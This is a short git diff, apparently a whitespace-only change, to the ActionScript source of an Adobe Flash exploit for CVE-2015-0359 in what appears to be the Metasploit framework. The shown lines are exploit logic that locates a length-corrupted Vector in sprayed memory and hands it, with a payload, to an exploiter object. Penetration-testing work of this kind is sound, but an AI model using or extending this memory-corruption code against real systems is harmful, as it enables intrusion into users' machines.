diff --git a/external/source/exploits/CVE-2015-0359/Exploit.as b/external/source/exploits/CVE-2015-0359/Exploit.as index 45e811a4a9..2846daaef7 100755 --- a/external/source/exploits/CVE-2015-0359/Exploit.as +++ b/external/source/exploits/CVE-2015-0359/Exploit.as @@ -102,20 +102,20 @@ package Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString()) if (mod == 1022) mc.receive() else { - for (var i:uint = 0; i < ov.length; i++) { - if (ov[i].length == 0xffffffff) { - uv = ov[i] - } else { - if (ov[i] != null) { - delete(ov[i]) - ov[i] = null - } - } - } - if (uv == null) { - Logger.log("[!] Exploit - onMessage(): Corrupted Vector not found") - return - } + for (var i:uint = 0; i < ov.length; i++) { + if (ov[i].length == 0xffffffff) { + uv = ov[i] + } else { + if (ov[i] != null) { + delete(ov[i]) + ov[i] = null + } + } + } + if (uv == null) { + Logger.log("[!] Exploit - onMessage(): Corrupted Vector not found") + return + } exploiter = new Exploiter(this, platform, os, payload, uv) } }